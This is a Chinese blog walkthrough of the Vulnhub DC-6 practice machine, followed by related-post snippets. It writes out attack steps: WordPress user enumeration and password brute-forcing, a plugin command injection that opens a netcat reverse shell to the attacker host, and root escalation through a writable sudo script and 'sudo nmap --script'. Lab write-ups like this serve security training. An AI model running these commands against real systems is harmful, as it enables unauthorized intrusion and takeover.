简单系列靶场dc 6

最新推荐文章于 2024-09-30 17:57:44 发布
最新推荐文章于 2024-09-30 17:57:44 发布
阅读量395 收藏 7
点赞数 9
分类专栏: dc系列 文章标签: 网络 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dj445566/article/details/134610624
版权

一:信息收集阶段

1.首先确定目标机与kalI在同一网段

2.确定对方ip

搜寻目标端口及服务的详细信息,发现开有80,22 以及目标的cms为wordpress

首先访问一下80web看看,发现强制跳转到了wordy,所以需要在主机hosts文件里修改hosts文件和在kali里修改

访问成功后,确实为wordpress,这里他们提示他们的插件是最安全的,那么这个网页的插件可能有漏洞

即为wordpress那么根据对wordpress的了解我们直接在url后面访问一下wp-admin 发现进入了后台登录页面

那我们就在kali中使用wpscan对网站进行专项扫描,枚举出了五个用户

wpscan --url http://wordy  -e u #枚举用户

官方又给我们有提示告诉了我们密码的字典

cat /usr/share/wordlists/rockyou.txt | grep k01 > password.txt

那我们把上面的用户建立一个文本,使用wpscan开始爆破,得到mark的密码,那就进后台登录一下

登进去后根据提示主要是看哪里有插件看看是否存在漏洞,随便点点发现里面有个插件可以执行命令

这个输入框有字数限制,通过bp抓包也行,或者f12打开开发者工具进行修改长度,最后都是执行nc反弹,并在kali监听

nc 192.168.150.128 8899 -e /bin/bash

成功拿到shell权限为www-data,下一步就是进行提权

二、提权阶段

1.首先写个伪终端

python -c "import pty;pty.spawn('/bin/bash')"

2.查看suid权限

find / -perm -u=s -type f 2>/dev/null

3.查看sudo权限

sudo -l

4.发现都不行,进入home家目录全部查看在/home/mark/stuff/things-to-do.txt发现了graham的密码

5.ssh登录graham

ssh graham@192.168.226.130

6.查看suid权限

find / -perm -u=s -type f 2>/dev/null

7.查看sudo权限

sudo -l

8.查看到jens的执行脚本,查看内容

cat /home/jens/backups.sh

9.查看权限

ls -l /home/jens/backups.sh

10.有修改权限,开始修改并执行

echo "/bin/bash" >> /home/jens/backups.sh
sudo -u jens /home/jens/backups.sh

11.查看suid权限

find / -perm -u=s -type f 2>/dev/null

12.查看sudo权限

sudo -l

13.发现可以利用的命令nmap,查询使用方法

14.根据命令提权

TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF

15.提权成功查找flag

dj445566
关注
专栏目录
Vulnhub靶场 DC系列 DC-4靶场
sdfsergfr的博客
12-10 378
Vulnhub靶场 CD系列 CD-4靶场 ,黑盒实验,反弹shell网站,利用22端口ssh服务,kali密码爆破,得到admin用户的密码happy,登录admin用户 bp对radio位置的发送,得到密码字典 old-passwords.bak。添加反弹shell,得到密码字典 old-passwords.bak。九头蛇hydra:利用密码字典发现ssh的账号:jim密码: jibril04 。finalshell ssh连接 对文件查找 得到用户:Charles 密码:^xHhA&hvim0y。
Vulnhub系列DC5靶场详解
weixin_50053818的博客
05-13 1759
文章目录环境文件包含突破点screen提权 环境 vulhub系列DC5靶场 VMware虚拟机 kali 文件包含突破点 根据目标靶机MAC地址得到靶机IP为192.168.43.160,直接上nmap扫描。 发现开放了80、111、36936端口,暂时只知道端口80是web站点,另外两个端口未知。其他无头绪,直接访问网页。 进入网页,一堆的英文,看了一下内容发现没有什么用,只有Contact页面有几个输入点,经过SQL注入和XSS测试,没有发现相关漏洞。 卡了半天没有找到什么突破点了,所以尝试
Vulnhub靶场 | DC系列 - DC1
哦 卷!
07-13 1220
发现该网站是 drupal[//]: # (Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成,在GPL2.0及更新协议下发布。根据上面flag1.txt的提示,在网站目录中寻找相应的配置文件(当然没有提示,也应该寻找看一下,毕竟是敏感文件)。,则需要登录flag4用户。查看 users 表中的内容:由于列数比较多,查看内容比较乱,可以使用。尝试查看flag4用户的家目录,确实存在flag4.txt文件,
简单系列靶场dc1
dj445566的博客
11-27 365
本文为简单记录的简单系列靶场dc 1,对内容有什么不懂的地方可以私信或评论交流
DC系列靶场---DC 6靶场的渗透测试
zhouA0221的博客
08-07 974
使用graham用户查看sudo的使用权限,看到jens用户可以不用输入密码执行backups.sh脚本。Mark家目录下有个文本文件,内容就是有个用户graham账户文件中是有这个用户的,后面的很可能就是这个用户的密码。6、在从graham用户切换到jens用户时查看sudo权限的时候要注意脚本文件,脚本是直接可以进行提权的。这里我们使用插件看到这是WordPress的CMS,wpscan准门针对WordPress开发的。5、信息收集的时候一定要注意用户家目录的文本文件,这里面很容易出现密码。
DC系列靶场---DC 5靶场的渗透测试
zhouA0221的博客
08-06 1239
DOS格式的文本文件在Linux底下,用较低版本的vi打开时行尾会显示^M,而且很多命令都无法很好的处理这种格式的文件,如果是个shell脚本,。因此产生了两种格式文件相互转换的需求,对应的将UNIX格式文本文件转成成DOS格式的是unix2dos命令。提交后重定向到thankyou.php的文件中,随着不断刷新,看到页脚的版本在发生改变,这个就是文件包含漏洞啦。服务器执行PHP文件时,可以通过文件包含函数加载另外一个文件(参数),另外一个文件中的PHP代码就会被执行,file=footer.php。
简单系列靶场dc7
dj445566的博客
11-28 339
本文为简单系列靶场dc7,如果有不懂的地方可以评论或私信交流
DC系列靶场---DC 1靶场的渗透测试(一)
zhouA0221的博客
07-17 1386
也就是提示我们去查看这个CMS的配置文件。因为Drupal是开源的所以我们是可以通过搜索引擎搜到配置文件的路径的。我们的思路可以从官方文档中查找一些关于drupal7的密码恢复之类的文件。这里用户有两个用户,我们只需要关注admin这个用户,这个应该是网站管理员的账户和密码。我们已经成功登录到目标主机的mysql数据库了,我们看一下数据库中有哪些重要的信息。看到这是flag2,从flag2中我们可以看到这是mysql的账号和密码。看到一个users的数据表,这个表中我们通过名字应该能猜测到这个是用户表。
简单靶场dc系列4
dj445566的博客
11-24 429
本文为dc系列4 ,如果有内容不懂的地方可以评论或私信交流
vuln靶场——DC-1
qq_54480761的博客
05-03 1522
我们切换语句进入shell,执行whoami查看当前的权限,执行ls查看当前目录下的文件,切换到root目录。典型的drupal,启动Metersploit,MSF存在drupal模块,尝试使用msf渗透。查看www目录下文件,发现flag1.txt文件,打开发现提示信息,内容提示寻找站点的配置文件。搜索Drupal 7的漏洞发现可利用的漏洞很多,搜索与Drupal 7相关的漏洞利用模块。登陆战点之后,随便点几个选项,例如左上角的Content,发现flag3。进行登录,密码是之前我们自己替换的。
Vulnhub靶场渗透测试系列DC-3(Joomla CMS漏洞和Ubuntu16.04漏洞)
qq_45722813的博客
12-07 3050
Vulnhub靶场渗透测试DC-3 靶机下载地址:https://www.five86.com/dc-3.html 攻击机为kali2021,IP地址:192.168.172.131 将靶机导入到VMware,设置网络模式为NAT模式,开启靶机虚拟机 在kali攻击机使用nmap进行存活主机发现来获取靶机IP地址,命令nmap -T4 -Pn 192.168.172.1/24 但是发现没有扫描到靶机IP,可能是靶机网络设置问题,参考文章:https://editor.csdn.net/md/?artic
VulnHub靶场系列:Chili
快吃小蛋糕吧的博客
10-05 1397
VulnHub靶场系列:Chili 刚刚在VulnHub官网上找了些简单的靶机,感觉这个还挺适合新手的 环境部署: https://download.vulnhub.com/chili/Chili.ova 实战: 首先使用工具扫描靶机所在网段,得到靶机IP: root@kali:/# nmap -sP 192.168.200.129/24 Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-05 08:56 CST Nmap scan report f
【技术分享】实战dc-3靶场及其技巧讲解
军火库
07-22 318
本期技术文章将与大家分享小星实战“dc-3靶场”的经验,通过分析其渗透过程以及不同的getshell方法,与大家共同探讨该靶场的破解技巧。
【STM32】 TCP/IP通信协议(3)--LwIP网络接口
m0_73409202的博客
09-30 433
LwIP协议栈支持多种不同的,由于网卡是直接跟硬件平台打交道,硬件不同则处理也是不同。那Iwip如何兼容这些不同的网卡呢?LwIP提供统一的接口,底层函数需要用户自行完成,例如网卡的初始化、接收和发送数据等。当LwIP底层接收到网络数据时,需要经过层层递交才会传入内核处理;相反,LwIP发送数据时也会调用网卡的发送数据。对于没有接触过LwIP的人新手来说,我们如何编写这个底层代码呢?不用担心,LwIP提供了一个ethernetif.c 文件作为底层接口的驱动模版。用户只根据自己的网络设备进行参照修改即可。
MQTT--EMQX入门+MQTTX使用
最新发布
CJPSR的博客
09-30 634
EMQ X基于 Erlang/OTP 平台开发的MQTT 消息服务器,是开源社区中最流行的 MQTT 消息服务器。EMQ X 是开源百万级分布式。
信息安全对抗演习:应对网络威胁的坚实防线
dexun123的博客
09-29 629
演习结束后,需要对整个演习过程进行总结和评估。分析演习中发现的问题和不足并提出改进措施;同时总结经验教训为未来的演习提供参考。
2024ICPC网络赛2记录:CK
zsyzClb的博客
09-25 352
不过看到异或就知道这个异或肯定不是白给你的,大概就是用字典树,一开始我以为是把两个数组分开建字典树,后面发现要一起建,然后就想到用dp来维护。这一把我们三个人手感都很好,前六题都是一遍过,然后我又切掉了非签到的E和C,最后时间不是很多,K只想到大概字典树的思路,细节不是很懂就直接开冲,当然是没有冲出来。我们想了很多错误的思路以后才开始思考kmp,然后就想到了可以一直跳kmp,只需要把相同的合并起来,如果能匹配的就全部一起跳过,不匹配的就直接删掉,时间复杂度O(n)。看上去要求某种匹配数的个数,有点吓人。
通信工程学习:什么是LAN局域网、MAN城域网、WAN广域网
limengshi138392的博客
09-29 636
通信工程学习:什么是LAN局域网、MAN城域网、WAN广域网
【计算机网络】--URL统一资源定位符
weixin_65728773的博客
09-26 327
一个网站地址实例scheme——定义因特网服务的类型,常见的类型是httphost——定义域主机(http的默认主机是www)domain———定义因特网的域名,例如,jinyun.fun:port——定义主机上的端口(http默认端口号是80)path——定义服务器上的路径(如果省略,则文档必须位于网站的根目录)filename——定义文档/资源的名称。
DC-1靶场攻防:信息收集与Drupal漏洞挖掘
本教程聚焦于名为DC-1的靶机,通过一系列步骤来展示如何找到并利用靶机上的漏洞来获取flag。下面我们将详细探讨这个过程。 首先,启动靶机。DC-1是一个虚拟机,使用OVF文件进行导入和启动。在Kali Linux攻击机(192...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值